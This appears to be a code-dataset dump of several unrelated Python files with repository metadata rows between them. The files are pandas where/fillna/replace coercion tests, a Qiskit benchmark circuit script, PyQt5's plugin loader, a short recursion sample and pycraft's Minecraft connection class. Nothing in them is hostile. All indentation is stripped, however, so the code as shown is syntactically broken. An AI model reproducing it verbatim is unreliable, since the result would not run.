[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.bool)],
)
def test_where_series_bool(self, fill_val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool
cond = pd.Series([True, False, True, False])
exp = pd.Series([True, fill_val, True, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([True, values[1], True, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), np.object),
],
ids=["datetime64", "datetime64tz"],
)
def test_where_series_datetime64(self, fill_val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Series([True, False, True, False])
exp = pd.Series(
[pd.Timestamp("2011-01-01"), fill_val, pd.Timestamp("2011-01-03"), fill_val]
)
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
values = pd.Series(pd.date_range(fill_val, periods=4))
if fill_val.tz:
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02 00:00", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04 00:00", tz="US/Eastern"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
values[1],
pd.Timestamp("2011-01-03"),
values[3],
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
def test_where_index_datetime(self):
fill_val = pd.Timestamp("2012-01-01")
exp_dtype = "datetime64[ns]"
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="GH 22839: do not ignore timezone, must be object")
def test_where_index_datetimetz(self):
fill_val = pd.Timestamp("2012-01-01", tz="US/Eastern")
exp_dtype = np.object
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04", tz="US/Eastern"),
],
dtype=exp_dtype,
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
def test_where_index_complex128(self):
pass
def test_where_index_bool(self):
pass
def test_where_series_datetime64tz(self):
pass
def test_where_series_timedelta64(self):
pass
def test_where_series_period(self):
pass
def test_where_index_datetime64tz(self):
pass
def test_where_index_timedelta64(self):
pass
def test_where_index_period(self):
pass
class TestFillnaSeriesCoercion(CoercionBase):
# not indexing, but place here for consistency
method = "fillna"
def test_has_comprehensive_tests(self):
pass
def _assert_fillna_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by fillna """
target = original.copy()
res = target.fillna(value)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val, fill_dtype",
[(1, np.object), (1.1, np.object), (1 + 1j, np.object), (True, np.object)],
)
def test_fillna_object(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(["a", np.nan, "c", "d"])
assert obj.dtype == np.object
exp = klass(["a", fill_val, "c", "d"])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.float64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_fillna_float64(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass([1.1, np.nan, 3.3, 4.4])
assert obj.dtype == np.float64
exp = klass([1.1, fill_val, 3.3, 4.4])
# float + complex -> we don't support a complex Index
# complex for Series,
# object for Index
if fill_dtype == np.complex128 and klass == pd.Index:
fill_dtype = np.object
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, np.object),
],
)
def test_fillna_series_complex128(self, fill_val, fill_dtype):
obj = pd.Series([1 + 1j, np.nan, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, 4 + 4j])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), np.object),
(1, np.object),
("x", np.object),
],
ids=["datetime64", "datetime64tz", "object", "object"],
)
def test_fillna_datetime(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(
[
pd.Timestamp("2011-01-01"),
pd.NaT,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = klass(
[
pd.Timestamp("2011-01-01"),
fill_val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01"), np.object),
(pd.Timestamp("2012-01-01", tz="Asia/Tokyo"), np.object),
(1, np.object),
("x", np.object),
],
)
def test_fillna_datetime64tz(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
tz = "US/Eastern"
obj = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.NaT,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
fill_val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
def test_fillna_series_int64(self):
pass
def test_fillna_index_int64(self):
pass
def test_fillna_series_bool(self):
pass
def test_fillna_index_bool(self):
pass
def test_fillna_series_timedelta64(self):
pass
def test_fillna_series_period(self):
pass
def test_fillna_index_timedelta64(self):
pass
def test_fillna_index_period(self):
pass
class TestReplaceSeriesCoercion(CoercionBase):
klasses = ["series"]
method = "replace"
rep: Dict[str, List] = {}
rep["object"] = ["a", "b"]
rep["int64"] = [4, 5]
rep["float64"] = [1.1, 2.2]
rep["complex128"] = [1 + 1j, 2 + 2j]
rep["bool"] = [True, False]
rep["datetime64[ns]"] = [pd.Timestamp("2011-01-01"), pd.Timestamp("2011-01-03")]
for tz in ["UTC", "US/Eastern"]:
# to test tz => different tz replacement
key = "datetime64[ns, {0}]".format(tz)
rep[key] = [
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
]
rep["timedelta64[ns]"] = [pd.Timedelta("1 day"), pd.Timedelta("2 day")]
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
ids=[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"datetime64tz",
"timedelta64",
],
)
@pytest.mark.parametrize(
"from_key",
[
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64[ns]",
"datetime64[ns, UTC]",
"datetime64[ns, US/Eastern]",
"timedelta64[ns]",
],
)
def test_replace_series(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xxx")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if from_key.startswith("datetime") and to_key.startswith("datetime"):
# tested below
return
elif from_key in ["datetime64[ns, US/Eastern]", "datetime64[ns, UTC]"]:
# tested below
return
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
if (from_key == "float64" and to_key in ("int64")) or (
from_key == "complex128" and to_key in ("int64", "float64")
):
if compat.is_platform_32bit() or compat.is_platform_windows():
pytest.skip(
"32-bit platform buggy: {0} -> {1}".format(from_key, to_key)
)
# Expected: do not downcast by replacement
exp = pd.Series(self.rep[to_key], index=index, name="yyy", dtype=from_key)
else:
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["timedelta64[ns]", "bool", "object", "complex128", "float64", "int64"],
)
@pytest.mark.parametrize(
"from_key", ["datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"]
)
def test_replace_series_datetime_tz(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
@pytest.mark.parametrize("how", ["dict", "series"])
@pytest.mark.parametrize(
"to_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
@pytest.mark.parametrize(
"from_key",
["datetime64[ns]", "datetime64[ns, UTC]", "datetime64[ns, US/Eastern]"],
)
def test_replace_series_datetime_datetime(self, how, to_key, from_key):
index = pd.Index([3, 4], name="xyz")
obj = pd.Series(self.rep[from_key], index=index, name="yyy")
assert obj.dtype == from_key
if how == "dict":
replacer = dict(zip(self.rep[from_key], self.rep[to_key]))
elif how == "series":
replacer = pd.Series(self.rep[to_key], index=self.rep[from_key])
else:
raise ValueError
result = obj.replace(replacer)
exp = pd.Series(self.rep[to_key], index=index, name="yyy")
assert exp.dtype == to_key
tm.assert_series_equal(result, exp)
def test_replace_series_period(self):
pass
| [
"[email protected]"
] | |
4728310efd0b4e2eaa6e3535d1903dc3d22b7567 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC2091.py | 737923b2439c1fa807fa1cda167fcd2579578343 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,252 | py | # qubit number=4
# total number=35
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=15
prog.cz(input_qubit[0],input_qubit[3]) # number=16
prog.h(input_qubit[3]) # number=17
prog.x(input_qubit[3]) # number=13
prog.h(input_qubit[3]) # number=20
prog.cz(input_qubit[0],input_qubit[3]) # number=21
prog.h(input_qubit[3]) # number=22
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[1]) # number=29
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.h(input_qubit[0]) # number=23
prog.cz(input_qubit[2],input_qubit[0]) # number=24
prog.h(input_qubit[0]) # number=25
prog.y(input_qubit[2]) # number=30
prog.cx(input_qubit[2],input_qubit[0]) # number=11
prog.cx(input_qubit[2],input_qubit[0]) # number=18
prog.h(input_qubit[0]) # number=26
prog.cx(input_qubit[0],input_qubit[2]) # number=32
prog.x(input_qubit[2]) # number=33
prog.cx(input_qubit[0],input_qubit[2]) # number=34
prog.cz(input_qubit[2],input_qubit[0]) # number=27
prog.h(input_qubit[0]) # number=28
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC2091.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"[email protected]"
] | |
bda335ed88fe441e1737f4dd3b25d75487239999 | 4da852082af72bd25f5c7016ab781d544aa3d88d | /PyQt5/uic/port_v2/load_plugin.py | 5c141ba81b810cbd6d172000529dcda39e31574a | [] | no_license | pyqt/python-qt5-mavericks | 9241ba98d63a76d1d0a490e8095e7b1d25158f8c | ffb84f9c3f0fc277cdf06a0ae430219987cf9ab4 | refs/heads/master | 2021-01-01T16:21:16.360643 | 2015-04-13T15:30:47 | 2015-04-13T15:30:47 | 33,808,029 | 4 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,519 | py | #############################################################################
##
## Copyright (c) 2015 Riverbank Computing Limited <[email protected]>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## [email protected].
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
from ..exceptions import WidgetPluginError
def load_plugin(plugin, plugin_globals, plugin_locals):
""" Load the given plugin (which is an open file). Return True if the
plugin was loaded, or False if it wanted to be ignored. Raise an exception
if there was an error.
"""
try:
exec(plugin.read(), plugin_globals, plugin_locals)
except ImportError:
return False
except Exception, e:
raise WidgetPluginError("%s: %s" % (e.__class__, str(e)))
return True
| [
"[email protected]"
] | |
2ad5e098cbfdc9aab82ed4a4c64b2957d0a8a24c | 56122577951c39e62571de3390613b67ea379e5c | /sample.py | e61bcc3108ef30cfa7907cd532deb3340c77ce97 | [] | no_license | nedbat/blank_prz | e29ac4b0945e805e276aa553a1bb3f1d46c53bdb | bd95bd503319c214ed00b4bbef3de7119af55c80 | refs/heads/master | 2023-06-22T04:05:40.399584 | 2020-01-25T22:46:29 | 2020-01-25T23:02:35 | 86,907,227 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | def f(n):
print("Look!: {}".format(n))
if n > 0:
f(n-1)
f(4)
| [
"[email protected]"
] | |
8f3e69c784b486f684321c1493ffb4cb4592cacb | f1a6013a41ea5d49e034d1932991ef039e767e34 | /utils/pycraft/networking/connection.py | 3cdd151a106a80699845e57ca79f86954c8b7016 | [
"Apache-2.0"
] | permissive | Merrg1n/PCRC | a544c234ea1eea79bb6fb235cc610d14090d6a7f | 0af9f6d3a1f9f2e0b78b71241176968b0e5983af | refs/heads/master | 2023-01-24T01:16:57.956263 | 2020-06-18T09:10:11 | 2020-06-18T09:10:11 | 256,414,160 | 2 | 1 | Apache-2.0 | 2020-04-30T04:01:53 | 2020-04-17T05:54:22 | Python | UTF-8 | Python | false | false | 36,447 | py | from __future__ import print_function
import copy
import traceback
from collections import deque
from threading import RLock
import zlib
import threading
import socket
import timeit
import select
import sys
import json
import re
from future.utils import raise_
from .types import VarInt
from .packets import clientbound, serverbound
from . import packets
from . import encryption
from .. import SUPPORTED_PROTOCOL_VERSIONS, SUPPORTED_MINECRAFT_VERSIONS
from ..exceptions import (
VersionMismatch, LoginDisconnect, IgnorePacket, InvalidState
)
STATE_STATUS = 1
STATE_PLAYING = 2
class ConnectionContext(object):
"""A ConnectionContext encapsulates the static configuration parameters
shared by the Connection class with other classes, such as Packet.
Importantly, it can be used without knowing the interface of Connection.
"""
def __init__(self, **kwds):
self.protocol_version = kwds.get('protocol_version')
class _ConnectionOptions(object):
def __init__(self, address=None, port=None, compression_threshold=-1,
compression_enabled=False):
self.address = address
self.port = port
self.compression_threshold = compression_threshold
self.compression_enabled = compression_enabled
class Connection(object):
"""This class represents a connection to a minecraft
server, it handles everything from connecting, sending packets to
handling default network behaviour
"""
def __init__(
self,
address,
port=25565,
auth_token=None,
username=None,
initial_version=None,
allowed_versions=None,
handle_exception=None,
handle_exit=None,
recorder=None
):
"""Sets up an instance of this object to be able to connect to a
minecraft server.
The connect method needs to be called in order to actually begin
the connection
:param address: address of the server to connect to
:param port(int): port of the server to connect to
:param auth_token: :class:`pycraft.authentication.AuthenticationToken`
object. If None, no authentication is attempted and
the server is assumed to be running in offline mode.
:param username: Username string; only applicable in offline mode.
:param initial_version: A Minecraft version ID string or protocol
version number to use if the server's protocol
version cannot be determined. (Although it is
now somewhat inaccurate, this name is retained
for backward compatibility.)
:param allowed_versions: A set of versions, each being a Minecraft
version ID string or protocol version number,
restricting the versions that the client may
use in connecting to the server.
:param handle_exception: The final exception handler. This is triggered
when an exception occurs in the networking
thread that is not caught normally. After
any other user-registered exception handlers
are run, the final exception (which may be the
original exception or one raised by another
handler) is passed, regardless of whether or
not it was caught by another handler, to the
final handler, which may be a function obeying
the protocol of 'register_exception_handler';
the value 'None', meaning that if the
exception was otherwise uncaught, it is
re-raised from the networking thread after
closing the connection; or the value 'False',
meaning that the exception is never re-raised.
:param handle_exit: A function to be called when a connection to a
server terminates, not caused by an exception,
and not with the intention to automatically
reconnect. Exceptions raised from this function
will be handled by any matching exception handlers.
""" # NOQA
# This lock is re-entrant because it may be acquired in a re-entrant
# manner from within an outgoing packet listener
self._write_lock = RLock()
self.networking_thread = None
self.new_networking_thread = None
self.packet_listeners = []
self.early_packet_listeners = []
self.outgoing_packet_listeners = []
self.early_outgoing_packet_listeners = []
self._exception_handlers = []
self.running_networking_thread = 0
def proto_version(version):
if isinstance(version, str):
proto_version = SUPPORTED_MINECRAFT_VERSIONS.get(version)
elif isinstance(version, int):
proto_version = version
else:
proto_version = None
if proto_version not in SUPPORTED_PROTOCOL_VERSIONS:
raise ValueError('Unsupported version number: %r.' % version)
return proto_version
if allowed_versions is None:
self.allowed_proto_versions = set(SUPPORTED_PROTOCOL_VERSIONS)
else:
allowed_versions = set(map(proto_version, allowed_versions))
self.allowed_proto_versions = allowed_versions
if initial_version is None:
self.default_proto_version = max(self.allowed_proto_versions)
else:
self.default_proto_version = proto_version(initial_version)
self.context = ConnectionContext(
protocol_version=max(self.allowed_proto_versions))
self.options = _ConnectionOptions()
self.options.address = address
self.options.port = port
self.auth_token = auth_token
self.username = username
self.recorder = recorder
self.connected = False
self.handle_exception = handle_exception
self.exception, self.exc_info = None, None
self.handle_exit = handle_exit
# The reactor handles all the default responses to packets,
# it should be changed per networking state
self.reactor = PacketReactor(self)
def _start_network_thread(self):
with self._write_lock:
if self.networking_thread is not None and \
not self.networking_thread.interrupt or \
self.new_networking_thread is not None:
raise InvalidState('A networking thread is already running.')
elif self.networking_thread is None:
self.networking_thread = NetworkingThread(self)
self.networking_thread.start()
else:
# This thread will wait until the existing thread exits, and
# then set 'networking_thread' to itself and
# 'new_networking_thread' to None.
self.new_networking_thread \
= NetworkingThread(self, previous=self.networking_thread)
self.new_networking_thread.start()
def write_packet(self, packet, force=False):
"""Writes a packet to the server.
If force is set to true, the method attempts to acquire the write lock
and write the packet out immediately, and as such may block.
If force is false then the packet will be added to the end of the
packet writing queue to be sent 'as soon as possible'
:param packet: The :class:`network.packets.Packet` to write
:param force(bool): Specifies if the packet write should be immediate
"""
packet.context = self.context
if force:
with self._write_lock:
self._write_packet(packet)
else:
self._outgoing_packet_queue.append(packet)
def listener(self, *packet_types, **kwds):
"""
Shorthand decorator to register a function as a packet listener.
"""
def listener_decorator(handler_func):
self.register_packet_listener(handler_func, *packet_types, **kwds)
return handler_func
return listener_decorator
def exception_handler(self, *exc_types, **kwds):
"""
Shorthand decorator to register a function as an exception handler.
"""
def exception_handler_decorator(handler_func):
self.register_exception_handler(handler_func, *exc_types, **kwds)
return handler_func
return exception_handler_decorator
def register_packet_listener(self, method, *packet_types, **kwds):
"""
Registers a listener method which will be notified when a packet of
a selected type is received.
If :class:`pycraft.networking.connection.IgnorePacket` is raised from
within this method, no subsequent handlers will be called. If
'early=True', this has the additional effect of preventing the default
in-built action; this could break the internal state of the
'Connection', so should be done with care. If, in addition,
'outgoing=True', this will prevent the packet from being written to the
network.
:param method: The method which will be called back with the packet
:param packet_types: The packets to listen for
:param outgoing: If 'True', this listener will be called on outgoing
packets just after they are sent to the server, rather
than on incoming packets.
:param early: If 'True', this listener will be called before any
built-in default action is carried out, and before any
listeners with 'early=False' are called. If
'outgoing=True', the listener will be called before the
packet is written to the network, rather than afterwards.
"""
outgoing = kwds.pop('outgoing', False)
early = kwds.pop('early', False)
target = self.packet_listeners if not early and not outgoing \
else self.early_packet_listeners if early and not outgoing \
else self.outgoing_packet_listeners if not early \
else self.early_outgoing_packet_listeners
target.append(packets.PacketListener(method, *packet_types, **kwds))
def register_exception_handler(self, handler_func, *exc_types, **kwds):
"""
Register a function to be called when an unhandled exception occurs
in the networking thread.
When multiple exception handlers are registered, they act like 'except'
clauses in a Python 'try' clause, with the earliest matching handler
catching the exception, and any later handlers catching any uncaught
exception raised from within an earlier handler.
Regardless of the presence or absence of matching handlers, any such
exception will cause the connection and the networking thread to
terminate, the final exception handler will be called (see the
'handle_exception' argument of the 'Connection' contructor), and the
original exception - or the last exception raised by a handler - will
be set as the 'exception' and 'exc_info' attributes of the
'Connection'.
:param handler_func: A function taking two arguments: the exception
object 'e' as in 'except Exception as e:', and the corresponding
3-tuple given by 'sys.exc_info()'. The return value of the function is
ignored, but any exception raised in it replaces the original
exception, and may be passed to later exception handlers.
:param exc_types: The types of exceptions that this handler shall
catch, as in 'except (exc_type_1, exc_type_2, ...) as e:'. If this is
empty, the handler will catch all exceptions.
:param early: If 'True', the exception handler is registered before
any existing exception handlers in the handling order.
"""
early = kwds.pop('early', False)
assert not kwds, 'Unexpected keyword arguments: %r' % (kwds,)
if early:
self._exception_handlers.insert(0, (handler_func, exc_types))
else:
self._exception_handlers.append((handler_func, exc_types))
def _pop_packet(self):
# Pops the topmost packet off the outgoing queue and writes it out
# through the socket
#
# Mostly an internal convenience function, caller should make sure
# they have the write lock acquired to avoid issues caused by
# asynchronous access to the socket.
# This should be the only method that removes elements from the
# outbound queue
if len(self._outgoing_packet_queue) == 0:
return False
else:
self._write_packet(self._outgoing_packet_queue.popleft())
return True
def _write_packet(self, packet):
# Immediately writes the given packet to the network. The caller must
# have the write lock acquired before calling this method.
try:
for listener in self.early_outgoing_packet_listeners:
listener.call_packet(packet)
if self.options.compression_enabled:
packet.write(self.socket, self.options.compression_threshold)
else:
packet.write(self.socket)
for listener in self.outgoing_packet_listeners:
listener.call_packet(packet)
except IgnorePacket:
pass
def status(self, handle_status=None, handle_ping=False):
"""Issue a status request to the server and then disconnect.
:param handle_status: a function to be called with the status
dictionary None for the default behaviour of
printing the dictionary to standard output, or
False to ignore the result.
:param handle_ping: a function to be called with the measured latency
in milliseconds, None for the default handler,
which prints the latency to standard outout, or
False, to prevent measurement of the latency.
"""
with self._write_lock: # pylint: disable=not-context-manager
self._check_connection()
self._connect()
self._handshake(next_state=STATE_STATUS)
self._start_network_thread()
do_ping = handle_ping is not False
self.reactor = StatusReactor(self, do_ping=do_ping)
if handle_status is False:
self.reactor.handle_status = lambda *args, **kwds: None
elif handle_status is not None:
self.reactor.handle_status = handle_status
if handle_ping is False:
self.reactor.handle_ping = lambda *args, **kwds: None
elif handle_ping is not None:
self.reactor.handle_ping = handle_ping
request_packet = serverbound.status.RequestPacket()
self.write_packet(request_packet)
def connect(self):
"""
Attempt to begin connecting to the server.
May safely be called multiple times after the first, i.e. to reconnect.
"""
# Hold the lock throughout, in case connect() is called from the
# networking thread while another connection is in progress.
with self._write_lock: # pylint: disable=not-context-manager
self._check_connection()
# It is important that this is set correctly even when connecting
# in status mode, as some servers, e.g. SpigotMC with the
# ProtocolSupport plugin, use it to determine the correct response.
# PCRC modified the value to default_proto_version
self.context.protocol_version = self.default_proto_version
self.spawned = False
self._connect()
if len(self.allowed_proto_versions) == 1:
# There is exactly one allowed protocol version, so skip the
# process of determining the server's version, and immediately
# connect.
self._handshake(next_state=STATE_PLAYING)
login_start_packet = serverbound.login.LoginStartPacket()
if self.auth_token:
login_start_packet.name = self.auth_token.profile.name
else:
login_start_packet.name = self.username
self.write_packet(login_start_packet)
self.reactor = LoginReactor(self)
self.recorder.on_protocol_version_decided(self.allowed_proto_versions.copy().pop())
else:
# Determine the server's protocol version by first performing a
# status query.
self._handshake(next_state=STATE_STATUS)
self.write_packet(serverbound.status.RequestPacket())
self.reactor = PlayingStatusReactor(self)
self._start_network_thread()
def check_connection(self):
return self._check_connection()
def _check_connection(self):
if self.networking_thread is not None and \
not self.networking_thread.interrupt or \
self.new_networking_thread is not None:
raise InvalidState('There is an existing connection.')
def _connect(self):
# Connect a socket to the server and create a file object from the
# socket.
# The file object is used to read any and all data from the socket
# since it's "guaranteed" to read the number of bytes specified,
# the socket itself will mostly be used to write data upstream to
# the server.
self._outgoing_packet_queue = deque()
info = socket.getaddrinfo(self.options.address, self.options.port,
0, socket.SOCK_STREAM)
# Prefer to use IPv4 (for backward compatibility with previous
# versions that always resolved hostnames to IPv4 addresses),
# then IPv6, then other address families.
def key(ai):
return 0 if ai[0] == socket.AF_INET else \
1 if ai[0] == socket.AF_INET6 else 2
ai_faml, ai_type, ai_prot, _ai_cnam, ai_addr = min(info, key=key)
self.socket = socket.socket(ai_faml, ai_type, ai_prot)
self.socket.connect(ai_addr)
self.file_object = self.socket.makefile("rb", 0)
self.options.compression_enabled = False
self.options.compression_threshold = -1
self.connected = True
def disconnect(self, immediate=False):
"""Terminate the existing server connection, if there is one.
If 'immediate' is True, do not attempt to write any packets.
"""
with self._write_lock: # pylint: disable=not-context-manager
self.connected = False
if not immediate and self.socket is not None:
# Flush any packets remaining in the queue.
while self._pop_packet():
pass
if self.networking_thread is not None:
self.networking_thread.interrupt = True
if self.socket is not None:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
finally:
self.socket.close()
self.socket = None
def _handshake(self, next_state=STATE_PLAYING):
handshake = serverbound.handshake.HandShakePacket()
handshake.protocol_version = self.context.protocol_version
handshake.server_address = self.options.address
handshake.server_port = self.options.port
handshake.next_state = next_state
